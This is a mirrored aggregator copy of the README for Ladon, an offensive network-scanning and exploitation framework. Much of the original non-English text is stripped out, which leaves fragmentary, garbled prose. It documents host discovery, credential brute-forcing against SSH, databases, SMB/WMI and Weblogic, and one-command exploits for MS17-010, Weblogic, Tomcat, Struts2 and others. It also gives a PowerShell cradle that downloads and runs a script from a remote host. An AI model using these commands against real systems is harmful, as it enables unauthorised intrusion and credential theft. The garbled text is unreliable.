Awesome Open Source
Awesome Open Source

Ladon 7.0 for PowerShell

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license

Ladon

LadonGUI

Cobalt Strike

PowerLadon

PythonLadon

LinuxLadon

ID URL
1 Ladon https://github.com/k8gege/Ladon/wiki
2 https://github.com/k8gege/Ladon/wiki/Ladon-Usage
3 Cobalt Strike https://awesomeopensource.com/project/k8gege/Aggressor
4 Exp https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
5 https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
6 https://github.com/k8gege/K8CScan/wiki
7 PowerLadon https://awesomeopensource.com/project/k8gege/powerladon
8 PythonLadon https://awesomeopensource.com/project/k8gege/PyLadon
9 LinuxLadon https://awesomeopensource.com/project/k8gege/LinuxLadon
10 https://github.com/k8gege/K8CScan/tree/master/Video

git clone https://github.com/k8gege/Ladon.git
VS2012.net 3.54.0EXE

https://github.com/k8gege/Ladon/releases
Win7/2008.net 2.x 3.x3.5exe
Win8-win10.net 4.x4.0exe

Ladon


7



1-21

C/BA

LadonGetShellA/B/CURL5.740,IPMS17010WeblogicActiveMQTomcatStruts211(MysqlOracleMSSQL)FTPSSH(Linux)VNCWindows(IPCWMISMB)WeblogicRarWeb75WebPOC.NETDLL(C#/Delphi/VC)PowerShell,INIEXPPOCLadonCobalt Strike

Ladon,,
90%,

Ladon.exe.net 2.0Win(Win7.net)
CmdPowerShellCmdWebShellCobalt Strike
Ladon.ps1win7-win10 PowerShell


MPYM
LadonC#500K500K
PowerShell,PYGO


1 IP
2
3
4 C(ip/24)
5 B(ip/16)
6 A(ip/8)
7 URL
8 IP(ip.txt)
9 C(ip24.txt)
10 B(ip16.txt)
11 URL(url.txt)
12 (domain.txt)
13 (host.txt)
14 (str.txt)
15 (check.txt)
16 (userpass.txt)
17 C
18 DLLC#
19 EXEC#
20 INI
21 PowerShell
22 ()
23 (DLL/.NET/PowerShell)
24 Cobalt Strike(beacon)

(40)

0x001

: Ladon OnlinePC(C)
: Ladon 192.168.1.8/24 OnlinePC

ID | | | -|-|-|- 1 | OnlinePC | | IPMac 2 | OnlineIP | IP | IP 3 | UrlScan | URL | URLIPWeb 4 | SameWeb | | URLIPWeb 5 | WebScan | Web | IPBannerWeb 6 | WebDir | | HTTP 7 | SubDomain | | (DomainIP/HostIP) 8 | DomainIP | IP | IP 9 | HostIP | IP | IP

0x002 /

: Ladon OsScan
: Ladon 192.168.1.8/24 OsScan

ID | | | -|-|-|- 1 | OsScan | | IP 2 | PortScan | Banner | BannerWeb 3 | WhatCMS | 75Web | URLCMS 4 | CiscoScan | | IPBoot 5 | EnumMssql | Mssql | IPSQL 6 | EnumShare | | IP

0x003 /

[(IP:)( )(IP )]

: Ladon SshScan
: Ladon 192.168.1.8/24 SshScan
: Ladon 192.168.1.8:22 SshScan ()
: Ladon test.rar RarScan

ID | | | | -|-|-|-|- 1 | WmiScan | Wmi(Windowns) | | 2 | IpcScan | Ipc(Windows) | | 3 | SmbScan | SMB(Windows) | | SharpCifs.dll 4 | SshScan | SSH(Linux) | | Renci.SshNet.dll 5 | MssqlScan | Mssql | | 6 | OracleScan | Oracle | | DDTek.Oracle.dll 7 | MysqlScan | Mysql | | MySql.Data.dll 8 | WeblogicScan | Weblogic | | 9 | VncScan | VNC | | VncSharp.dll 10 | FtpScan | Ftp | | 11 | RarScan | Rar | | Rar.exe 12 | TomcatScan | Tomcat | 13 | HttpBasicScan | HttpBasic401 |

0x004 /

: Ladon MS17010
: Ladon 192.168.1.8/24 MS17010
: Ladon http://192.168.1.8 WeblogicExp

ID | |
-|-|- 1 | MS17010 | SMB(CVE-2017-0143/CVE-2017-0144/CVE-2017-0145/CVE-2017-0146/CVE-2017-0148)
2 | WeblogicPoc | Weblogic(CVE-2019-2725/CVE-2018-2894)
3 | PhpStudyPoc | PhpStudy(phpstudy 2016/phpstudy 2018)
4 | ActivemqPoc | ActiveMQ(CVE-2016-3088)
5 | TomcatPoc | Tomcat(CVE-2017-12615)
6 | WeblogicExp | Weblogic(CVE-2019-2725)
7 | TomcatExp | Tomcat(CVE-2017-12615)
8 | Struts2Poc | Struts2(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

0x005

: Ladon EnHex
: Ladon EnHex (str.txt)

ID | |
-|-|- 1 | EnHex | Hex
2 | DeHex | Hex
3 | EnBase64 | Base64
4 | DeBase64 | Base64


INIEXP
ExpPocLadon

(10)

ID | | |
-|-|-|- 1 | | C | CVE 2019-0708 Windows Rdp 3389 2 | | Exp |ThinkPHP 5.0.22 5.1.29 RCE GetShell Exploit 3 | | Python | CVE-2019-9621 Zimbra GetShell Exploit 4 | | Python | CVE-2019-0604 SharePoint GetShell Exploit 5 | | Exp | CVE 2016-3088 ActiveMQ GetShell Exploit 6 | | Python | Apache Solr 8.2.0 Velocity RCE 0day Exploit 7 | | Exp | PhpStudy GetShell Exploit 8 | | INI | INILinux 9 | | INI | INIWindowns 10 | | Python | PHP-FPM (CVE-2019-11043) 11 | | Exp |Weblogic CVE-2018-2894 12 | | PowerShell | MS17010EXP

Cscan: https://github.com/k8gege/K8CScan/wiki

0x001 ip/24 ip/16 ip/8
: Ladon 192.168.1.8/24 OnlinePC

0x002 ip.txt ip24.txt ip16.txt url.txt host.txt domain.txt str.txt
,ipip.txt,Cip24.txt
txt,: Ladon OnlinePC

ping

icmp
ping,noping,
Ladon noping
Ladon noping 192.168.1.8/24
Ladon noping 192.168.1.8/24 MS17010

INI


POCDLL
3
LadonIPURLIP

POC

1 ping ping.ini
[Ladon]
exe=cmd.exe
arg=/c ping $ip$

: Ladon ping.ini
: Ladon 192.168.1.8/24 ping.ini

2 Python poc [Ladon]
exe=F:\Python279\python.exe
arg=CVE-2019-11043-POC.py $ip$

: https://awesomeopensource.com/project/k8gege/CVE-2019-11043

PortScan
Ladon
port.txt
1:80,21,1433,3306,445
2:80-88,21-23,5800-5900
3:
21
23
80
4:
80-88
21-23

1 user.txtpass.txt
2 userpass.txt,
3 check.txtIP////,


##### mssql()
IPLadon IP: MssqlScan
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
: Ladon MssqlScan
##### oracle
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
: Ladon OracleScan
##### mysql
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
: Ladon MysqlScan

SSH
check.txt
192.168.1.8 22 root k8gege
192.168.1.8 root k8gege
: Ladon SshScan
SMB/IPC/WMI(ip//)
check.txt 192.168.1.8 root k8gege
: Ladon WmiScan

weblogic
check.txt(url )
http://192.168.1.8:7001/console weblogic k8gege
: Ladon WeblogicScan

Rar,pass.txt,txtAnsi
: Ladon test.rar RarScan

PowerShell

PowerLadonwin7-win10 PowerShell.net
PowerShell,CMDEXE

0x001 PowerShell

PowerShellShellCobalt Strike

> powershell 
> Import-Module .\Ladon.ps1
> Ladon OnlinePC

0x002 Cmd

ShellCMD

> powershell Import-Module .\Ladon.ps1;Ladon OnlinePC

0x003 Cmd

ShellCMD

> powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC"

004 NCSHELLLadon

http://k8gege.org/p/LadonNC.html

Ladon

MSF
Ladon
INIHTTPEXPPOC
C#DelphiVCDLLPowerShell

0x001 Exp

EXP: https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
: https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2018-2894

0x002

: https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle

0x003

https://github.com/k8gege/Ladon/raw/master/Moudle_Demo.rar

WIKI,

Top


Get A Weekly Email With Trending Projects For These Topics
No Spam. Unsubscribe easily at any time.
Security (8,585
Hacking (2,387
Exploit (1,061
Pentest (610
Poc (572
Pentest Tool (418
Related Projects